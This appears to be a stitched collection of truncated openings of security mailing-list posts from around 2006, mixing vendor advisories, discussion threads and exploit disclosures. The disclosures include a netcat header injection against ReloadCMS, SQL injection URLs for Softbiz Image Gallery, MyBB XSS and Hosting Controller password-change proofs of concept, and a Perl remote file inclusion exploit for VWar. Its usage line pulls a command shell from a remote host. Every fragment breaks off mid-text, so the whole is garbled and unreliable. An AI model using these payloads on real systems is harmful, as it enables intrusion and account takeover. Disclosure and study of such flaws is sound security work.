When IPv6 is active on an interface of an ISA Server 2004, it seems that IPv6
packets are not filtered and bypass the firewall.
I try to send an ICMP IPv4 packet through the network to ISA Server, this
packet was dropped, then I try an ICMP IPv6 packet which successfully works!
The same kind o
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID : SYMSA-2006-002
Advisory Name: McAfee WebShield SMTP Format String Vulnerability
Release Date : 04-03-2005
Application : McAfee Web
http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."
vulnerability:
ReloadCMS does not properly sanitize the User-Agent request header before storing it
in the stats.dat file.
Example of attack, through netcat:
rgod>nc target.host.com 80
GET /path_to_reloadc
[snip]
>>
>
>
> I haven't heard anyone talk about requiring that users use their ISP's
> DNS server. Just that they should not be able to use any random DNS
> server on the internet.
This is standard practice in Wireless and other ISPs which operate pay
as you go service (hotels, conferences,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:062
http://www.mandriva.com/security/
___
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:064
http://www.mandriva.com/security/
___
Crispin Cowan wrote:
Steven M. Christey wrote:
One difficulty is that we can't really know a product's full audit
history. If a researcher looks at a piece of software and finds
nothing of interest, that doesn't get reported. (Sardonix, we hardly
knew ye.)
Agreed. Sardonix was clearly n
> 1. Resolvers and Authoritative nameservers must be separate and
> authoritative nameservers must have recursion turned off. Otherwise
> there is no way to throttle only recursive queries.
Great, for small ISPs you just doubled the number of machines they need to
dedicate to DNS.
> 2. In a smal
--- Gadi Evron <[EMAIL PROTECTED]> wrote:
> David M Chess wrote:
> > But many of us *love* to argue about taxonomies and word meanings (it's
> > cheaper than booze anyway). *8)
> 1. A user-assisted remote attack.
> 2. A client-side remote attack.
>
> I.e., we can add "user assisted" as a class
Dear nosecualestunombre :P
[EMAIL PROTECTED] wrote:
What you are talking about is "separability". You are pointing out that you can in fact
separate what is good and what is garbage from the picture. We do mention such a problem, but it
is not the worst of it at all. The real problem with thi
Hi Michael, thanks for noticing my project. You've pretty much made
my point about why I'm doing this, as robots.txt shouldn't be used as
an ACL. That's exactly the reason why I'm doing this crawling. I'm
trying to find out how widespread of an issue this is, and to see how
this is being misused
nuqneH,
On Sat, Apr 01, 2006 at 03:00:30PM -0800, Crispin Cowan wrote:
> >
> IMHO the biggest thing that makes Firefox on Linux more secure than IE
> on Windows is that you don't run Firefox as root/administrator, so when
> it gets hacked, it doesn't 0wn the machine.
Actually there is only one
Hello
Vulnerable: Softbiz Image Gallery
http://www.softbizscripts.com
Exploit :
http://example.com/imagegallery/image_desc.php?id=[SQL]
http://example.com/imagegallery/template.php?provided=[SQL]
http://example.com/imagegallery/suggest_image.php?cid=[SQL]
http://example.com/imagegallery/insert_
On Mon, 3 Apr 2006, Gadi Evron wrote:
> Looking at Microsoft's software of today, it is extremely well-written
> and professional. Far beyond that of most others. Finding
> vulnerabilities in them is extremely difficult. Most vulnerabilities you
> will find will be logical in nature and not easy.
Crispin Cowan wrote:
Kind of: absence of evidence is not evidence of absence, but that
applies both ways. The absence of a vulnerability history does not
indicate that the product is secure or insecure, it indicates that no
one has looked, or at least no one has reported looking.
Like you state
> What is stopping you from running your own local DNS server?
What is stopping you from running your own SMTP server? A port 25 block?
Well if an ISP doesn't want to play whack-a-mole with unsecured dns servers
popping up every day do you not think it likely that they will resort to the
same tec
I hope nobody generates passwords with ANY kind of pseudo-RNG. No
matter how good those algorithms are (and linear congruential
generators, the algorithm type of the bash function, usually aren't
very good), the results can be reproduced. Therefore you shouldn't
really generate your passwords with
MyBB 1.10 CrossSiteScripting
File :- inc/functions_post.php
BugTraqer :- Devil-00 < [EMAIL PROTECTED] >
We can attack through some unfiltered tags :-
Post New Thread Or New Reply With This Code :D
And Try To Move The Mouse Over The Email ;)
[code]
Multiple Vulnerabilities in LucidCMS
Author : Rusydi Hasan M
a.k.a: cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap
--- Software description
lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collecti
#!/usr/bin/perl
##
# VWar <= 1.5.0 R12 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl vwar.pl
#
# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
##
#
> I know that good IP filtering on the sysklogd box is the best fix, but
> always resolving hostnames of the log messages' sender is definitely not
> a good idea..
The -x switch takes care of this problem.
-x Disable name lookups when receiving remote messages.
This avoids deadlocks
We reported this XSS (in PHP display_errors) on 28 May 2005.
http://bugs.php.net/bug.php?id=33173&edit=1
Reply from PHP developers: "Bogus".
"...Show errors is only a convenience thing to aid you while developing. Thus
no user will ever see such error messages. So in
I think I just discovered a flaw in what appears to be a common way to
see bash's $RANDOM function. bash provides a pseudo-random number,
from 0-32767, using the $RANDOM function. You can seed this by setting
RANDOM=42 or some other number. Otherwise it is seeded by the process
id and time.
There
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
I've found 2 vulnerabilities in Hosting Controller that allow remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:
This allows modifying passwords:
http://[URL]/admin/accounts/AccountAc
DESCRIPTION:
I've found another Internet Explorer Address Bar Spoofing Vulnerability that
can be exploited by phishers. This allows an attacker to inject a malicious
shockwave-flash application into Internet Explorer while it is displaying another
URL (even trusted sites).
If you are loading a shockwave-fl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1000-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 3rd, 2006
===
Ubuntu Security Notice USN-266-1 April 03, 2006
dia vulnerabilities
CVE-2006-1550
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Steven M. Christey wrote:
> The fact that a product has a long history of bugs should not be
> regarded as an indicator of its current level of security compared to
> other products.
>
Why? Past performance may not be a perfect predictor of future
performance, but it is very often one of the bes
==
Secunia Research 03/04/2006
- AN HTTPD Script Source Disclosure Vulnerability -
==
Table of Contents
Affected Software.
Moroccan Security Team (|ucif3r)
Greetz To All Friend
Phpwebgallery 1.4.1 is vulnerable to SQL Injection Attacks
The flaw is due to input validation errors in the "category.php" script when
handling the "search" variables, which could be exploited by malicious people to
conduct SQL injection at